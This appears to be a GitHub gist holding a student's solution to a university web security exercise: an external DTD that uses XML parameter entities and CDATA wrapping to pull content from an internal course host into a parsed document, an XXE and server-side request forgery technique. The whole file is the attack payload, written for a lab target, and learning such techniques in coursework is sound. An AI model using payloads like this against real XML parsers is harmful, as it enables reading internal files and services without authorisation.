Last active
June 19, 2025 15:51
-
-
Save dev-it-yannik/12f4923067eaf6295e9970239cf4bbdb to your computer and use it in GitHub Desktop.
Web Security Exercise 8 2c)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % start "<![CDATA["> | |
<!ENTITY % file SYSTEM "https://internal.websec.cs.uni-paderborn.de/second"> | |
<!ENTITY % end "]]>"> | |
<!ENTITY all "%start;%file;%end;"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment